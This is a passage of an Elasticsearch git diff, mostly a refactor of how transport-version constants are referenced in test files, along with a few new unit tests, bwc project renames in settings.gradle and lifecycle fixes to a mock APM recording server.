getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } @@ -616,7 +615,7 @@ public RescoreContext innerBuildContext(int windowSize, SearchExecutionContext c @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return 
TransportVersion.zero(); } } @@ -662,7 +661,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/test/java/org/elasticsearch/search/SearchServiceSingleNodeTests.java b/server/src/test/java/org/elasticsearch/search/SearchServiceSingleNodeTests.java index 9ef888da81596..5111b43feed8a 100644 --- a/server/src/test/java/org/elasticsearch/search/SearchServiceSingleNodeTests.java +++ b/server/src/test/java/org/elasticsearch/search/SearchServiceSingleNodeTests.java @@ -21,7 +21,6 @@ import org.apache.lucene.util.SetOnce; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.DocWriteResponse; import org.elasticsearch.action.OriginalIndices; @@ -44,6 +43,7 @@ import org.elasticsearch.action.support.WriteRequest; import org.elasticsearch.client.internal.Client; import org.elasticsearch.cluster.metadata.IndexMetadata; +import org.elasticsearch.cluster.routing.RecoverySource; import org.elasticsearch.cluster.routing.ShardRouting; import org.elasticsearch.cluster.routing.ShardRoutingState; import org.elasticsearch.cluster.routing.TestShardRouting; @@ -1255,8 +1255,22 @@ public void testBeforeShardLockDuringShardCreate() { TestShardRouting.newShardRouting( new ShardId(indexService.index(), 0), randomAlphaOfLength(5), - randomBoolean(), - ShardRoutingState.INITIALIZING + true, + ShardRoutingState.INITIALIZING, + RecoverySource.EmptyStoreRecoverySource.INSTANCE + ), + indexService.getIndexSettings().getSettings() + ); + assertEquals(1, service.getActiveContexts()); + + boolean primary = randomBoolean(); + service.beforeIndexShardCreated( + TestShardRouting.newShardRouting( + new ShardId(indexService.index(), 0), + randomAlphaOfLength(5), + primary, + ShardRoutingState.INITIALIZING, + primary ? 
RecoverySource.ExistingStoreRecoverySource.INSTANCE : RecoverySource.PeerRecoverySource.INSTANCE ), indexService.getIndexSettings().getSettings() ); @@ -2911,7 +2925,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/test/java/org/elasticsearch/search/aggregations/AggregationBuilderTests.java b/server/src/test/java/org/elasticsearch/search/aggregations/AggregationBuilderTests.java index 8c5608fe1bea5..4f28e93f0706f 100644 --- a/server/src/test/java/org/elasticsearch/search/aggregations/AggregationBuilderTests.java +++ b/server/src/test/java/org/elasticsearch/search/aggregations/AggregationBuilderTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.search.aggregations; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.TriConsumer; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.pipeline.AbstractPipelineAggregationBuilder; @@ -151,7 +150,7 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } @@ -184,7 +183,7 @@ protected void validate(ValidationContext context) {} @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } } diff --git a/server/src/test/java/org/elasticsearch/search/aggregations/AggregatorFactoriesTests.java b/server/src/test/java/org/elasticsearch/search/aggregations/AggregatorFactoriesTests.java index afe694a716341..8773418ece4fe 100644 --- a/server/src/test/java/org/elasticsearch/search/aggregations/AggregatorFactoriesTests.java +++ b/server/src/test/java/org/elasticsearch/search/aggregations/AggregatorFactoriesTests.java @@ -10,7 +10,6 @@ import org.apache.lucene.util.SetOnce; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; @@ -389,7 +388,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/test/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptAggregatorTests.java b/server/src/test/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptAggregatorTests.java index ba6b9ddabdaf1..2d501226c2698 100644 --- a/server/src/test/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptAggregatorTests.java +++ b/server/src/test/java/org/elasticsearch/search/aggregations/pipeline/BucketScriptAggregatorTests.java @@ -30,7 +30,9 @@ import org.elasticsearch.script.ScriptModule; import org.elasticsearch.script.ScriptService; import org.elasticsearch.script.ScriptType; +import org.elasticsearch.search.aggregations.AggregationBuilder; import org.elasticsearch.search.aggregations.AggregatorTestCase; +import org.elasticsearch.search.aggregations.bucket.filter.FilterAggregationBuilder; import org.elasticsearch.search.aggregations.bucket.filter.FiltersAggregationBuilder; import org.elasticsearch.search.aggregations.bucket.filter.InternalFilters; import org.elasticsearch.search.aggregations.bucket.terms.TermsAggregationBuilder; @@ -95,8 +97,42 @@ public void testScript() 
throws IOException { ); } + public void testNonMultiBucketParent() { + MappedFieldType fieldType = new NumberFieldMapper.NumberFieldType("number_field", NumberFieldMapper.NumberType.INTEGER); + MappedFieldType fieldType1 = new KeywordFieldMapper.KeywordFieldType("the_field"); + + FilterAggregationBuilder filter = new FilterAggregationBuilder("placeholder", new MatchAllQueryBuilder()).subAggregation( + new TermsAggregationBuilder("the_terms").userValueTypeHint(ValueType.STRING) + .field("the_field") + .subAggregation(new AvgAggregationBuilder("the_avg").field("number_field")) + ) + .subAggregation( + new BucketScriptPipelineAggregationBuilder( + "bucket_script", + Collections.singletonMap("the_avg", "the_terms['test1']>the_avg.value"), + new Script(ScriptType.INLINE, MockScriptEngine.NAME, SCRIPT_NAME, Collections.emptyMap()) + ) + ); + + assertThrows( + "Expected a multi bucket aggregation but got [InternalFilter] for aggregation [bucket_script]", + IllegalArgumentException.class, + () -> testCase(filter, new MatchAllDocsQuery(), iw -> { + Document doc = new Document(); + doc.add(new SortedSetDocValuesField("the_field", new BytesRef("test1"))); + doc.add(new SortedNumericDocValuesField("number_field", 19)); + iw.addDocument(doc); + + doc = new Document(); + doc.add(new SortedSetDocValuesField("the_field", new BytesRef("test2"))); + doc.add(new SortedNumericDocValuesField("number_field", 55)); + iw.addDocument(doc); + }, f -> fail("This shouldn't be called"), fieldType, fieldType1) + ); + } + private void testCase( - FiltersAggregationBuilder aggregationBuilder, + AggregationBuilder aggregationBuilder, Query query, CheckedConsumer buildIndex, Consumer verify, diff --git a/server/src/test/java/org/elasticsearch/search/internal/ContextIndexSearcherTests.java b/server/src/test/java/org/elasticsearch/search/internal/ContextIndexSearcherTests.java index fe07cbf8efdfd..ce521dcc48ba5 100644 --- a/server/src/test/java/org/elasticsearch/search/internal/ContextIndexSearcherTests.java +++ b/server/src/test/java/org/elasticsearch/search/internal/ContextIndexSearcherTests.java @@ -400,6 +400,29 @@ private static void assertSlices(LeafSlice[] slices, int numDocs, int numThreads assertThat(sumDocs, equalTo(numDocs)); } + public void testClearQueryCancellations() throws IOException { + Directory dir = newDirectory(); + RandomIndexWriter w = new RandomIndexWriter(random(), dir); + w.addDocument(new Document()); + DirectoryReader reader = w.getReader(); + ContextIndexSearcher searcher = new ContextIndexSearcher( + reader, + IndexSearcher.getDefaultSimilarity(), + IndexSearcher.getDefaultQueryCache(), + IndexSearcher.getDefaultQueryCachingPolicy(), + true + ); + + assertFalse(searcher.hasCancellations()); + searcher.addQueryCancellation(() -> {}); + assertTrue(searcher.hasCancellations()); + + searcher.clearQueryCancellations(); + assertFalse(searcher.hasCancellations()); + + IOUtils.close(reader, w, dir); + } + public void testExitableTermsMinAndMax() throws IOException { Directory dir = newDirectory(); IndexWriter w = new IndexWriter(dir, newIndexWriterConfig(null)); diff --git a/server/src/test/java/org/elasticsearch/search/query/SlowRunningQueryBuilder.java b/server/src/test/java/org/elasticsearch/search/query/SlowRunningQueryBuilder.java index 0c188256e0287..7fb6cd85579ed 100644 --- a/server/src/test/java/org/elasticsearch/search/query/SlowRunningQueryBuilder.java +++ b/server/src/test/java/org/elasticsearch/search/query/SlowRunningQueryBuilder.java @@ -15,7 +15,6 @@ import 
org.apache.lucene.search.ScoreMode; import org.apache.lucene.search.Weight; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.lucene.search.Queries; @@ -72,7 +71,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/server/src/test/java/org/elasticsearch/search/query/ThrowingQueryBuilder.java b/server/src/test/java/org/elasticsearch/search/query/ThrowingQueryBuilder.java index 8c21e95f48483..5ec16dce0b457 100644 --- a/server/src/test/java/org/elasticsearch/search/query/ThrowingQueryBuilder.java +++ b/server/src/test/java/org/elasticsearch/search/query/ThrowingQueryBuilder.java @@ -142,6 +142,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/test/java/org/elasticsearch/search/sort/GeoDistanceSortBuilderTests.java b/server/src/test/java/org/elasticsearch/search/sort/GeoDistanceSortBuilderTests.java index 17a9fb5974176..5bef1f4769cff 100644 --- a/server/src/test/java/org/elasticsearch/search/sort/GeoDistanceSortBuilderTests.java +++ b/server/src/test/java/org/elasticsearch/search/sort/GeoDistanceSortBuilderTests.java @@ -23,6 +23,7 @@ import org.elasticsearch.index.mapper.GeoPointFieldMapper; import org.elasticsearch.index.mapper.MappedFieldType; import org.elasticsearch.index.mapper.NestedPathFieldMapper; +import org.elasticsearch.index.mapper.NumberFieldMapper; import org.elasticsearch.index.query.GeoValidationMethod; import org.elasticsearch.index.query.MatchAllQueryBuilder; import org.elasticsearch.index.query.MatchNoneQueryBuilder; @@ -99,6 +100,9 @@ public static GeoDistanceSortBuilder randomGeoDistanceSortBuilder() { @Override protected MappedFieldType provideMappedFieldType(String name) { + if (name.equals("double")) { + return new NumberFieldMapper.NumberFieldType(name, NumberFieldMapper.NumberType.DOUBLE); + } return new GeoPointFieldMapper.GeoPointFieldType(name); } @@ -531,6 +535,12 @@ public void testBuildInvalidPoints() throws IOException { ); assertEquals("illegal longitude value [-360.0] for [GeoDistanceSort] for field [fieldName].", ex.getMessage()); } + { + GeoDistanceSortBuilder sortBuilder = new GeoDistanceSortBuilder("double", 0.0, 180.0); + sortBuilder.validation(GeoValidationMethod.STRICT); + IllegalArgumentException ex = expectThrows(IllegalArgumentException.class, () -> sortBuilder.build(searchExecutionContext)); + assertEquals("unable to apply geo distance sort to field [double] of type [double]", ex.getMessage()); + } } /** diff --git a/server/src/test/java/org/elasticsearch/search/suggest/SuggestTests.java b/server/src/test/java/org/elasticsearch/search/suggest/SuggestTests.java index f844f77d1dcef..c233dfc8e7de9 100644 --- a/server/src/test/java/org/elasticsearch/search/suggest/SuggestTests.java +++ b/server/src/test/java/org/elasticsearch/search/suggest/SuggestTests.java @@ -296,7 +296,7 @@ public void testMergingSuggestionOptions() { public void testSerialization() throws IOException { TransportVersion bwcVersion = TransportVersionUtils.randomVersionBetween( random(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersion.current() ); diff --git 
a/server/src/test/java/org/elasticsearch/transport/InboundDecoderTests.java b/server/src/test/java/org/elasticsearch/transport/InboundDecoderTests.java index fc06487fdcd41..03a99a0e7bb37 100644 --- a/server/src/test/java/org/elasticsearch/transport/InboundDecoderTests.java +++ b/server/src/test/java/org/elasticsearch/transport/InboundDecoderTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.transport; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.bytes.BytesReference; import org.elasticsearch.common.bytes.ReleasableBytesReference; import org.elasticsearch.common.io.stream.BytesStreamOutput; @@ -340,7 +339,7 @@ public void testCompressedDecode() throws IOException { public void testVersionIncompatibilityDecodeException() throws IOException { String action = "test-request"; long requestId = randomNonNegativeLong(); - TransportVersion incompatibleVersion = TransportVersionUtils.getPreviousVersion(TransportVersions.MINIMUM_COMPATIBLE); + TransportVersion incompatibleVersion = TransportVersionUtils.getPreviousVersion(TransportVersion.minimumCompatible()); final ReleasableBytesReference releasable1; try (RecyclerBytesStreamOutput os = new RecyclerBytesStreamOutput(recycler)) { final BytesReference bytes = OutboundHandler.serialize( @@ -369,13 +368,13 @@ public void testVersionIncompatibilityDecodeException() throws IOException { public void testCheckVersionCompatibility() { try { InboundDecoder.checkVersionCompatibility( - TransportVersionUtils.randomVersionBetween(random(), TransportVersions.MINIMUM_COMPATIBLE, TransportVersion.current()) + TransportVersionUtils.randomVersionBetween(random(), TransportVersion.minimumCompatible(), TransportVersion.current()) ); } catch (IllegalStateException e) { throw new AssertionError(e); } - TransportVersion invalid = TransportVersionUtils.getPreviousVersion(TransportVersions.MINIMUM_COMPATIBLE); + TransportVersion invalid = TransportVersionUtils.getPreviousVersion(TransportVersion.minimumCompatible()); try { InboundDecoder.checkVersionCompatibility(invalid); fail(); @@ -384,7 +383,7 @@ public void testCheckVersionCompatibility() { "Received message from unsupported version: [" + invalid.toReleaseVersion() + "] minimal compatible version is: [" - + TransportVersions.MINIMUM_COMPATIBLE.toReleaseVersion() + + TransportVersion.minimumCompatible().toReleaseVersion() + "]", expected.getMessage() ); diff --git a/server/src/test/java/org/elasticsearch/transport/InboundHandlerTests.java b/server/src/test/java/org/elasticsearch/transport/InboundHandlerTests.java index c4e85e1d35d72..dfc97e26e67b6 100644 --- a/server/src/test/java/org/elasticsearch/transport/InboundHandlerTests.java +++ b/server/src/test/java/org/elasticsearch/transport/InboundHandlerTests.java @@ -12,7 +12,6 @@ import org.apache.logging.log4j.Level; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.support.PlainActionFuture; import org.elasticsearch.common.bytes.BytesArray; @@ -31,7 +30,6 @@ import org.elasticsearch.core.Tuple; import org.elasticsearch.tasks.TaskId; import org.elasticsearch.tasks.TaskManager; -import org.elasticsearch.telemetry.tracing.Tracer; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.MockLog; import org.elasticsearch.test.TransportVersionUtils; @@ -114,8 +112,7 @@ public void testPing() throws Exception { 
(request, channel, task) -> channelCaptor.set(channel), EsExecutors.DIRECT_EXECUTOR_SERVICE, false, - true, - Tracer.NOOP + true ); requestHandlers.registerHandler(registry); @@ -166,8 +163,7 @@ public TestResponse read(StreamInput in) throws IOException { }, EsExecutors.DIRECT_EXECUTOR_SERVICE, false, - true, - Tracer.NOOP + true ); requestHandlers.registerHandler(registry); String requestValue = randomAlphaOfLength(10); @@ -245,7 +241,7 @@ public void testClosesChannelOnErrorInHandshake() throws Exception { final TransportVersion remoteVersion = TransportVersionUtils.randomVersionBetween( random(), TransportVersionUtils.getFirstVersion(), - TransportVersionUtils.getPreviousVersion(TransportVersions.MINIMUM_COMPATIBLE) + TransportVersionUtils.getPreviousVersion(TransportVersion.minimumCompatible()) ); final long requestId = randomNonNegativeLong(); final Header requestHeader = new Header( diff --git a/server/src/test/java/org/elasticsearch/transport/InboundPipelineTests.java b/server/src/test/java/org/elasticsearch/transport/InboundPipelineTests.java index 78fbd7359fa2c..3759663d8cae7 100644 --- a/server/src/test/java/org/elasticsearch/transport/InboundPipelineTests.java +++ b/server/src/test/java/org/elasticsearch/transport/InboundPipelineTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.transport; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.breaker.CircuitBreaker; import org.elasticsearch.common.breaker.CircuitBreakingException; import org.elasticsearch.common.breaker.NoopCircuitBreaker; @@ -99,7 +98,7 @@ public void testPipelineHandling() throws IOException { toRelease.clear(); try (RecyclerBytesStreamOutput streamOutput = new RecyclerBytesStreamOutput(recycler)) { while (streamOutput.size() < BYTE_THRESHOLD) { - final TransportVersion version = randomFrom(TransportVersion.current(), TransportVersions.MINIMUM_COMPATIBLE); + final TransportVersion version = randomFrom(TransportVersion.current(), TransportVersion.minimumCompatible()); final String value = randomRealisticUnicodeOfCodepointLength(randomIntBetween(200, 400)); final boolean isRequest = randomBoolean(); Compression.Scheme compressionScheme = getCompressionScheme(); @@ -214,7 +213,7 @@ public void testDecodeExceptionIsPropagated() throws IOException { try (RecyclerBytesStreamOutput streamOutput = new RecyclerBytesStreamOutput(recycler)) { String actionName = "actionName"; - final TransportVersion invalidVersion = TransportVersionUtils.getPreviousVersion(TransportVersions.MINIMUM_COMPATIBLE); + final TransportVersion invalidVersion = TransportVersionUtils.getPreviousVersion(TransportVersion.minimumCompatible()); final String value = randomAlphaOfLength(1000); final boolean isRequest = randomBoolean(); final long requestId = randomNonNegativeLong(); diff --git a/server/src/test/java/org/elasticsearch/transport/ProxyConnectionStrategyTests.java b/server/src/test/java/org/elasticsearch/transport/ProxyConnectionStrategyTests.java index f9a9baf09898b..ffa1cfa6f2d33 100644 --- a/server/src/test/java/org/elasticsearch/transport/ProxyConnectionStrategyTests.java +++ b/server/src/test/java/org/elasticsearch/transport/ProxyConnectionStrategyTests.java @@ -11,7 +11,6 @@ import org.elasticsearch.ElasticsearchException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.Version; import org.elasticsearch.action.support.PlainActionFuture; import org.elasticsearch.cluster.ClusterName; @@ -250,7 +249,7 
@@ public void testConnectFailsWithIncompatibleNodes() { IndexVersions.MINIMUM_COMPATIBLE, IndexVersion.current() ); - TransportVersion incompatibleTransportVersion = TransportVersionUtils.getPreviousVersion(TransportVersions.MINIMUM_COMPATIBLE); + TransportVersion incompatibleTransportVersion = TransportVersionUtils.getPreviousVersion(TransportVersion.minimumCompatible()); try (MockTransportService transport1 = startTransport("incompatible-node", incompatibleVersion, incompatibleTransportVersion)) { TransportAddress address1 = transport1.boundAddress().publishAddress(); diff --git a/server/src/test/java/org/elasticsearch/transport/SniffConnectionStrategyTests.java b/server/src/test/java/org/elasticsearch/transport/SniffConnectionStrategyTests.java index e41d035aa1046..90ef3e80d5b47 100644 --- a/server/src/test/java/org/elasticsearch/transport/SniffConnectionStrategyTests.java +++ b/server/src/test/java/org/elasticsearch/transport/SniffConnectionStrategyTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.transport; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.Version; import org.elasticsearch.action.admin.cluster.remote.RemoteClusterNodesAction; import org.elasticsearch.action.admin.cluster.state.ClusterStateAction; @@ -393,7 +392,7 @@ public void testDiscoverWithSingleIncompatibleSeedNode() { IndexVersions.MINIMUM_COMPATIBLE, IndexVersion.current() ); - TransportVersion incompatibleTransportVersion = TransportVersionUtils.getPreviousVersion(TransportVersions.MINIMUM_COMPATIBLE); + TransportVersion incompatibleTransportVersion = TransportVersionUtils.getPreviousVersion(TransportVersion.minimumCompatible()); try ( MockTransportService seedTransport = startTransport( "seed_node", @@ -476,7 +475,7 @@ public void testConnectFailsWithIncompatibleNodes() { IndexVersions.MINIMUM_COMPATIBLE, IndexVersion.current() ); - TransportVersion incompatibleTransportVersion = TransportVersionUtils.getPreviousVersion(TransportVersions.MINIMUM_COMPATIBLE); + TransportVersion incompatibleTransportVersion = TransportVersionUtils.getPreviousVersion(TransportVersion.minimumCompatible()); try ( MockTransportService incompatibleSeedTransport = startTransport( "seed_node", diff --git a/server/src/test/java/org/elasticsearch/transport/TransportActionProxyTests.java b/server/src/test/java/org/elasticsearch/transport/TransportActionProxyTests.java index f64b012165478..e1a525cab3f52 100644 --- a/server/src/test/java/org/elasticsearch/transport/TransportActionProxyTests.java +++ b/server/src/test/java/org/elasticsearch/transport/TransportActionProxyTests.java @@ -11,7 +11,6 @@ import org.elasticsearch.ElasticsearchException; import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.Version; import org.elasticsearch.cluster.node.DiscoveryNode; import org.elasticsearch.cluster.node.VersionInformation; @@ -58,7 +57,7 @@ public class TransportActionProxyTests extends ESTestCase { IndexVersions.MINIMUM_COMPATIBLE, IndexVersion.current() ); - protected static final TransportVersion transportVersion0 = TransportVersions.MINIMUM_COMPATIBLE; + protected static final TransportVersion transportVersion0 = TransportVersion.minimumCompatible(); protected DiscoveryNode nodeA; protected MockTransportService serviceA; diff --git a/server/src/test/java/org/elasticsearch/transport/TransportHandshakerTests.java 
b/server/src/test/java/org/elasticsearch/transport/TransportHandshakerTests.java index fbbf2e92c89cd..7c08b8ab84204 100644 --- a/server/src/test/java/org/elasticsearch/transport/TransportHandshakerTests.java +++ b/server/src/test/java/org/elasticsearch/transport/TransportHandshakerTests.java @@ -11,7 +11,6 @@ import org.apache.logging.log4j.Level; import org.elasticsearch.Build; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.support.PlainActionFuture; import org.elasticsearch.cluster.node.DiscoveryNode; @@ -113,7 +112,7 @@ public void testIncompatibleHandshakeRequest() throws Exception { StreamInput input = bytesStreamOutput.bytes().streamInput(); input.setTransportVersion(HANDSHAKE_REQUEST_VERSION); - if (handshakeRequest.transportVersion.onOrAfter(TransportVersions.MINIMUM_COMPATIBLE)) { + if (handshakeRequest.transportVersion.onOrAfter(TransportVersion.minimumCompatible())) { final PlainActionFuture responseFuture = new PlainActionFuture<>(); final TestTransportChannel channel = new TestTransportChannel(responseFuture); @@ -204,7 +203,7 @@ public void testHandshakeResponseFromOlderNodeWithPatchedProtocol() throws Excep final var randomIncompatibleTransportVersion = getRandomIncompatibleTransportVersion(); final var handshakeResponse = new TransportHandshaker.HandshakeResponse(randomIncompatibleTransportVersion, randomIdentifier()); - if (randomIncompatibleTransportVersion.onOrAfter(TransportVersions.MINIMUM_COMPATIBLE)) { + if (randomIncompatibleTransportVersion.onOrAfter(TransportVersion.minimumCompatible())) { // we fall back to the best known version MockLog.assertThatLogger( () -> handler.handleResponse(handshakeResponse), @@ -258,11 +257,11 @@ public void testHandshakeResponseFromOlderNodeWithPatchedProtocol() throws Excep private static TransportVersion getRandomIncompatibleTransportVersion() { return randomBoolean() // either older than MINIMUM_COMPATIBLE - ? new TransportVersion(between(1, TransportVersions.MINIMUM_COMPATIBLE.id() - 1)) + ? 
new TransportVersion(between(1, TransportVersion.minimumCompatible().id() - 1)) // or between MINIMUM_COMPATIBLE and current but not known : randomValueOtherThanMany( TransportVersion::isKnown, - () -> new TransportVersion(between(TransportVersions.MINIMUM_COMPATIBLE.id(), TransportVersion.current().id())) + () -> new TransportVersion(between(TransportVersion.minimumCompatible().id(), TransportVersion.current().id())) ); } diff --git a/server/src/test/java/org/elasticsearch/transport/TransportServiceHandshakeTests.java b/server/src/test/java/org/elasticsearch/transport/TransportServiceHandshakeTests.java index d92e291712388..01c33219a632d 100644 --- a/server/src/test/java/org/elasticsearch/transport/TransportServiceHandshakeTests.java +++ b/server/src/test/java/org/elasticsearch/transport/TransportServiceHandshakeTests.java @@ -12,7 +12,6 @@ import org.apache.logging.log4j.Level; import org.elasticsearch.Build; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.Version; import org.elasticsearch.cluster.node.DiscoveryNode; import org.elasticsearch.cluster.node.DiscoveryNodeUtils; @@ -211,7 +210,7 @@ public void testIncompatibleNodeVersions() { TransportService transportServiceB = startServices( "TS_B", settings, - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), new VersionInformation( VersionUtils.getPreviousVersion(Version.CURRENT.minimumCompatibilityVersion()), IndexVersions.MINIMUM_COMPATIBLE, @@ -263,7 +262,7 @@ public void testIncompatibleTransportVersions() { TransportService transportServiceB = startServices( "TS_B", settings, - TransportVersionUtils.getPreviousVersion(TransportVersions.MINIMUM_COMPATIBLE), + TransportVersionUtils.getPreviousVersion(TransportVersion.minimumCompatible()), new VersionInformation(Version.CURRENT.minimumCompatibilityVersion(), IndexVersions.MINIMUM_COMPATIBLE, IndexVersion.current()), TransportService.NOOP_TRANSPORT_INTERCEPTOR ); @@ -418,7 +417,7 @@ public void testAcceptsMismatchedBuildHashFromDifferentVersion() { final TransportService transportServiceB = startServices( "TS_B", Settings.builder().put("cluster.name", "a").build(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), new VersionInformation(Version.CURRENT.minimumCompatibilityVersion(), IndexVersions.MINIMUM_COMPATIBLE, IndexVersion.current()), transportInterceptorB ); diff --git a/settings.gradle b/settings.gradle index f3463efc5af38..ee67bffe7a99c 100644 --- a/settings.gradle +++ b/settings.gradle @@ -1,6 +1,7 @@ import org.elasticsearch.gradle.internal.toolchain.OracleOpenJdkToolchainResolver import org.elasticsearch.gradle.internal.toolchain.ArchivedOracleJdkToolchainResolver import org.elasticsearch.gradle.internal.toolchain.AdoptiumJdkToolchainResolver +import org.elasticsearch.gradle.internal.toolchain.EarlyAccessCatalogJdkToolchainResolver pluginManagement { repositories { @@ -76,13 +77,14 @@ List projects = [ 'distribution:packages:deb', 'distribution:packages:aarch64-rpm', 'distribution:packages:rpm', - 'distribution:bwc:bugfix', - 'distribution:bwc:bugfix2', - 'distribution:bwc:bugfix3', - 'distribution:bwc:maintenance', - 'distribution:bwc:minor', - 'distribution:bwc:staged', - 'distribution:bwc:staged2', + 'distribution:bwc:major1', + 'distribution:bwc:major2', + 'distribution:bwc:major3', + 'distribution:bwc:major4', + 'distribution:bwc:minor1', + 'distribution:bwc:minor2', + 'distribution:bwc:minor3', + 'distribution:bwc:minor4', 'distribution:bwc:main', 
'distribution:tools:java-version-checker', 'distribution:tools:cli-launcher', diff --git a/test/external-modules/apm-integration/src/javaRestTest/java/org/elasticsearch/test/apmintegration/RecordingApmServer.java b/test/external-modules/apm-integration/src/javaRestTest/java/org/elasticsearch/test/apmintegration/RecordingApmServer.java index db2ce9fb83a55..d20f2d08719e7 100644 --- a/test/external-modules/apm-integration/src/javaRestTest/java/org/elasticsearch/test/apmintegration/RecordingApmServer.java +++ b/test/external-modules/apm-integration/src/javaRestTest/java/org/elasticsearch/test/apmintegration/RecordingApmServer.java @@ -15,7 +15,6 @@ import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import org.elasticsearch.core.SuppressForbidden; -import org.elasticsearch.xcontent.spi.XContentProvider; import org.junit.rules.ExternalResource; import java.io.BufferedReader; @@ -25,7 +24,6 @@ import java.net.InetAddress; import java.net.InetSocketAddress; import java.nio.charset.StandardCharsets; -import java.util.ArrayList; import java.util.List; import java.util.concurrent.ArrayBlockingQueue; import java.util.concurrent.TimeUnit; @@ -35,14 +33,12 @@ public class RecordingApmServer extends ExternalResource { private static final Logger logger = LogManager.getLogger(RecordingApmServer.class); - private static final XContentProvider.FormatProvider XCONTENT = XContentProvider.provider().getJsonXContent(); - final ArrayBlockingQueue received = new ArrayBlockingQueue<>(1000); private static HttpServer server; private final Thread messageConsumerThread = consumerThread(); private volatile Consumer consumer; - private volatile boolean consumerRunning = true; + private volatile boolean running = true; @Override protected void before() throws Throwable { @@ -56,7 +52,7 @@ protected void before() throws Throwable { private Thread consumerThread() { return new Thread(() -> { - while (consumerRunning) { + while (running) { if (consumer != null) { try { String msg = received.poll(1L, TimeUnit.SECONDS); @@ -74,28 +70,38 @@ private Thread consumerThread() { @Override protected void after() { + running = false; server.stop(1); - consumerRunning = false; + consumer = null; } private void handle(HttpExchange exchange) throws IOException { try (exchange) { - try { - try (InputStream requestBody = exchange.getRequestBody()) { - if (requestBody != null) { - var read = readJsonMessages(requestBody); - received.addAll(read); + if (running) { + try { + try (InputStream requestBody = exchange.getRequestBody()) { + if (requestBody != null) { + var read = readJsonMessages(requestBody); + received.addAll(read); + } } - } - } catch (RuntimeException e) { - logger.warn("failed to parse request", e); + } catch (Throwable t) { + // The lifetime of HttpServer makes message handling "brittle": we need to start handling and recording received + // messages before the test starts running. We should also stop handling them before the test ends (and the test + // cluster is torn down), or we may run into IOException as the communication channel is interrupted. + // Coordinating the lifecycle of the mock HttpServer and of the test ES cluster is difficult and error-prone, so + // we just handle Throwable and don't care (log, but don't care): if we have an error in communicating to/from + // the mock server while the test is running, the test would fail anyway as the expected messages will not arrive, and + // if we have an error outside the test scope (before or after) that is OK. 
+ logger.warn("failed to parse request", t); + } } exchange.sendResponseHeaders(201, 0); } } - private List readJsonMessages(InputStream input) throws IOException { + private List readJsonMessages(InputStream input) { // parse NDJSON return new BufferedReader(new InputStreamReader(input, StandardCharsets.UTF_8)).lines().toList(); } @@ -104,14 +110,7 @@ public int getPort() { return server.getAddress().getPort(); } - public List getMessages() { - List list = new ArrayList<>(received.size()); - received.drainTo(list); - return list; - } - public void addMessageConsumer(Consumer messageConsumer) { this.consumer = messageConsumer; } - } diff --git a/test/external-modules/apm-integration/src/javaRestTest/java/org/elasticsearch/test/apmintegration/TracesApmIT.java b/test/external-modules/apm-integration/src/javaRestTest/java/org/elasticsearch/test/apmintegration/TracesApmIT.java index 6b10140bd80ed..afb9243e0f3ef 100644 --- a/test/external-modules/apm-integration/src/javaRestTest/java/org/elasticsearch/test/apmintegration/TracesApmIT.java +++ b/test/external-modules/apm-integration/src/javaRestTest/java/org/elasticsearch/test/apmintegration/TracesApmIT.java @@ -91,7 +91,8 @@ public void testApmIntegration() throws Exception { client().performRequest(nodeStatsRequest); - finished.await(30, 